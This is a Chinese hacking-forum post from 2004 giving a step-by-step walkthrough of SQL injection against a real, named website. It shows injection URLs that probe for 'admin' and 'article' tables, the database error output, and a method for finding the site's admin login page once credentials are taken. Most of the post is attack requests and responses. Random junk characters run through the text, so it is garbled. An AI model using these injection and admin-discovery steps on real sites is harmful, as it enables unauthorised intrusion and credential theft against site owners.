- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版2 |* s- t5 h! E ~# m" @ B
1 P2 _8 \2 K9 u% C9 W
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?
( R& g4 w+ `% d. J6 R" b9 B/ z
, T: h7 R7 _' h+ h( r' g分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。
9 F$ _/ o/ K% F& ?* @
( \ L; A" {( @5 u/ N) f: c在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。/ s' b* x8 z3 S0 x
- z! q( J4 ]0 O- s- j" u这里我简单的介绍一个过程吧。7 f# \8 I3 R$ H! J1 t* g0 F
( X! P# M" Y' w# H首先我找到一个网站,是我们基地首页有连接的
: S5 y: L0 @; ]9 o; Ohttp://www.16china.com/hack/& i0 K1 m' @. W; \- d0 ^5 }/ J
; F( n- d! n8 q3 i) b$ a% K; }9 s随便选择一个分页:
0 @9 `9 H% B2 y* Zhttp://www.16china.com/hack/SoftView.Asp?SoftID=139
! r4 C" c1 _ W- ?典型的ASP。看看能不能注射
3 X! `$ @' ^2 ]8 Q- }http://www.16china.com/hack/SoftView.Asp?SoftID=139'
& e/ ?1 s5 B0 ^9 Q, z6 N6 R* J* J" f# X$ _返回:2 D9 a: _5 H# z+ k# l- k! D- x
Microsoft VBScript 编译器错误 错误 '800a03f6' 1 N" d- Z: Z L: `" G4 y
, a1 |" I1 z* D4 l8 k) r缺少 'End'
$ d9 G8 V" A/ ^% R$ w$ ~+ m3 b0 r8 X- _% U7 Q3 u0 C! v
/iisHelp/common/500-100.asp,行242
0 j& l0 h9 H; f0 u; m
& s: C- s0 \1 e; N1 V8 [Microsoft JET Database Engine 错误 '80040e14' 0 x. M5 t) Y( ?
1 T( s0 U5 E- E' H7 P; ^. r6 |# y
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。
( U% i2 A3 W# m: f" o4 ]! \& `( y1 {1 A- N% A
/hack/SoftView.Asp,行17 , n. i! _3 k& I. l0 C' G
再来:
- e: z/ @; a8 O3 _http://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1, z2 v& L$ ]; B
返回正常网页。
+ L; K/ o: H ~% }6 Y* j: C5 g$ l- l" M9 P6 `
提交: e! |% L2 c# F C. U* p, L
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0
5 G1 Y& a5 F/ D# I8 y4 R! a2 Y: m# o
返回正常页/
2 b3 ~" U, e; W. F, v) n( q, khttp://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0
V/ m) \7 u+ F5 z" p+ u5 P, c+ f/ U% a1 m/ [# J7 C% r& U
同样正常。
) r( i4 A( P+ K2 X" ]) s: Q2 h+ g: s0 P
http://www.16china.com/hack/Soft ... )%20from%20article)>=0
$ W, F% N+ S. N: H+ i5 I1 p' w
6 `3 s$ S+ y. y; j- g% H n% J……
+ N) v% C" G: ^9 i7 Q
6 \$ K5 V, x- K6 k; {& I5 v象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台
4 i9 C( _& K8 I+ t. ~. C+ ^按以往的经验我采用:, s) X" Z; }' S/ b1 L w7 F
http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
, J8 ?8 q" t0 }6 h" N. [我为什么不用http://www.16china.com/hack/admin.asp
3 i. |) o+ {9 B3 \http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
3 D: G' K5 X3 a' I' q* Zhttp://www.16china.com/hack/admin返回信息:
/ i: Q" ]# N- K T( z错误提示信息!
* {8 M! Y" f) O+ A( C) y4 S 产生错误的可能原因:+ Q J6 S/ L# i) b8 k
9 m n0 ?! p# v5 K6 g; A! k
% j( G* H9 D. G
您没有进入本页面的权限!本次操作已被记录!
4 v& o( k; W9 e+ @/ `可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.
7 B- V& h% P5 y T/ n; [+ S本页面为[管理员]专用,请先登陆后进入.
9 T g6 {8 J4 O( S
; Y" V5 n/ k Q0 y( `1 z0 I返回上一页... /*说明登陆URL为常用的如:index.asp...*/4 i- [3 R; d+ s" i ^4 b ~
查看HTML代码:& |* d5 d/ h, G" B0 I8 s$ w( D
<html><head><title>错误提示信息!</title>+ o6 O2 }" V# ?! a% P
! U5 X+ |4 E @6 g& \1 i4 q
……
8 D# V) Q, e0 D& y B% f: Q6 ^9 Y
7 X; x5 N7 N1 j$ q# {5 H3 y<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.4 c/ y) D! X D/ S& s
……
! V) f# z1 x V2 Q* d! g$ @/ M
5 x# I' M: g7 G0 H! T: X找到了:+ Z) d8 j7 u4 x- X. }' c0 D: j
http://www.16china.com/hack/admin/adminlogin.asp/ m: o5 E7 S3 L. g; K0 K1 t- @: F
F( L, y- `% ^2 B! c* y9 I7 i# f8 n0 A, T: }" R- y
看看他的源代码告诉我们些什么:
$ R" c) m2 z& ~
6 N$ w [- U$ `9 k& g( h2 F<html>
' b; |. n9 d- Y4 v' E
8 q, J$ d" ?& v4 g# M: v: U8 ]; D<head>$ N5 x) X* Q$ W; Q
<title>管理员登陆</title>% b4 b+ w1 M8 o) I. P7 v
% a; X8 b. }- z5 m3 o: ^…………… n. X8 Z" {7 J0 v
: J3 X) g# f; X& n关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
2 m& k7 }8 q. R3 K9 z& Fhttp://www.16china.com/hack/admin/adminlogin.asp?action=login
! I' P, e5 y+ Z0 b这里。. o/ f* ?3 T9 l$ ^
) Q) D3 f! S! b# E# R0 w. U只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……$ A; Z! q' n* j x) {7 R
9 k5 S' i8 ?" S8 I) z/ f5 s1 p
懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
